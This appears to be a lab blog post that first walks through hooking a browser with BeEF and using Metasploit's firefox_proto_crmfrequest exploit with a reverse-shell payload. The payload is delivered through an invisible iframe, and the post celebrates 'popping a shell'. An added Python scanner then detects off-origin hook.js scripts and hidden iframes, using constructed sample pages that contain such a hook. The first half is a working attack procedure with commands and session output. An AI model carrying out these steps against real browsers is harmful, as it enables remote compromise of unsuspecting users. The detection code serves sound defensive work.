Bake the following VMs

  • For the purposes of this blog post, the Kali Linux VM has the IP address of and the Ubuntu VM has ; you will need to change these to suit your local setup.
  • I would use the NAT or local host-only networking configuration for your VMware setup.

Kali Linux

  • Check that BEEF is installed
    • apt-get install beef-xss
  • Enable metasploit integration
    • Edit /etc/beef-xss/config.yaml
      • Set metasploit:
        enable: true
    • Edit /usr/share/beef-xss/extensions/metasploit/config.yaml
      • Set host and callback_host to be the IP address of the external interface of your Kali Linux VM
    • Start msfconsole and then issue the following command to enable the RPC server:
      • load msgrpc ServerHost=<your IP address> Pass=abc123
  • Start beef
    • cd /usr/share/beef-xss
    • beef -x
  • You can now browse to the BEEF UI (user/pass: beef) and start hooking browsers! 🙂


  • Your browser will now be hooked into BEEF; if you go back to your Kali VM and check the BEEF panel, you should see your browser listed there.
  • There are all kinds of funky things that you can do, but for now we’re going to concentrate on popping a shell.

  • Kali Linux
  • Go to your running msfconsole and enter
    • use exploit/multi/browser/firefox_proto_crmfrequest
    • set PAYLOAD firefox/shell_reverse_tcp
    • set LHOST
    • exploit
  • Metasploit should now be running the exploit server and will give you a target URL (. The next step is to get the victim browser to access it.
  • The stealthy way to do this is to get BEEF to generate an invisible iframe for you on the victim browser
  • Go back to the BEEF panel and choose your hooked browser and then:
  • You should now see the following output in msfconsole:
    • [*] firefox_proto_crmfrequest – Gathering target information.
    • [*] firefox_proto_crmfrequest – Sending response HTML.
    • [*] firefox_proto_crmfrequest – Sending HTML
    • [*] firefox_proto_crmfrequest – Sending the malicious addon
    • [*] Command shell session 1 opened ( -> at 2014-04-04 12:11:44 +0100
  • Congrats, you’ve now popped a shell! 🙂
  • Confirm with: sessions -l
  • Start to interact with it with: sessions -i <session number>
  • Try something like:
    • uname -a
      Linux vuln-client 2.6.24-26-generic #1 SMP Tue Dec 1 18:37:31 UTC 2009 i686 GNU/Linux
  • Enjoy the pwnage, poppin’ shells like you’re at a seafood restaurant! 😉
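From the defender's side, the walkthrough above leaves two artefacts in the victim's page: a script tag pulling hook.js from a host that is not the page's own origin, and an invisible iframe pointing at the exploit server. The check below scans captured HTML for both. It is an added example written for this post, not code from the post itself or from the BeEF or Metasploit projects; it assumes response bodies have been captured (for example from a web proxy) and that the page's legitimate origin is known. The sample HTML and the hostnames lab-attacker.test and demo-app.test are constructed for the demonstration.

```python
"""Flag off-origin hook scripts and hidden off-origin iframes in captured HTML.

Added example for this post (not BeEF's or Metasploit's code). Assumes the
defender has the HTML body and knows the page's own origin. The sample pages
and hostnames below are constructed.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Inline styles that hide an element entirely.
HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)


def _is_zero_size(value):
    """True for width/height values that render nothing visible (0, 0px, 1px)."""
    if value is None:
        return False
    m = re.match(r"\s*(\d+)", value)
    return m is not None and int(m.group(1)) <= 1


class HookFinder(HTMLParser):
    """Collect (kind, src) findings while parsing a page."""

    def __init__(self, page_origin):
        super().__init__()
        self.page_host = urlparse(page_origin).hostname
        self.findings = []

    def _off_origin(self, url):
        # Relative URLs have no hostname and are treated as same-origin.
        host = urlparse(url).hostname
        return host is not None and host != self.page_host

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        src = a.get("src")
        if not src:
            return
        if tag == "script":
            # BeEF serves its client as hook.js; an off-origin copy is the hook.
            filename = src.rsplit("/", 1)[-1].split("?")[0]
            if filename == "hook.js" and self._off_origin(src):
                self.findings.append(("hook_script", src))
        elif tag == "iframe":
            hidden = (
                _is_zero_size(a.get("width"))
                or _is_zero_size(a.get("height"))
                or bool(HIDDEN_STYLE.search(a.get("style") or ""))
            )
            # A hidden frame loading third-party content is the delivery pattern.
            if hidden and self._off_origin(src):
                self.findings.append(("hidden_offorigin_iframe", src))


def scan_html(html, page_origin):
    """Return a list of (kind, src) findings for one captured page body."""
    parser = HookFinder(page_origin)
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample: a page that has been hooked and given a hidden frame.
SAMPLE_HOOKED = """<html><body>
<h1>Demo app</h1>
<script src="/static/app.js"></script>
<script src="http://lab-attacker.test:3000/hook.js"></script>
<iframe src="http://lab-attacker.test:8080/landing" width="0" height="0"
        style="display:none"></iframe>
<iframe src="https://demo-app.test/help" width="600" height="400"></iframe>
</body></html>"""

# Constructed sample: same page with only first-party and visible content.
SAMPLE_CLEAN = """<html><body>
<script src="/static/app.js"></script>
<iframe src="https://demo-app.test/help" width="600" height="400"></iframe>
<iframe src="https://partner.example/widget" width="300" height="250"></iframe>
</body></html>"""

if __name__ == "__main__":
    for name, page in (("hooked", SAMPLE_HOOKED), ("clean", SAMPLE_CLEAN)):
        print(name, scan_html(page, "https://demo-app.test/"))
```

The two heuristics are deliberately narrow: a visible off-origin iframe (an embedded partner widget) and a hidden same-origin iframe both stay quiet, so the check can run over a proxy capture without burying the analyst in benign embeds. Renaming hook.js on the attacker side defeats the filename match, which is why the hidden off-origin iframe rule is kept independent of it.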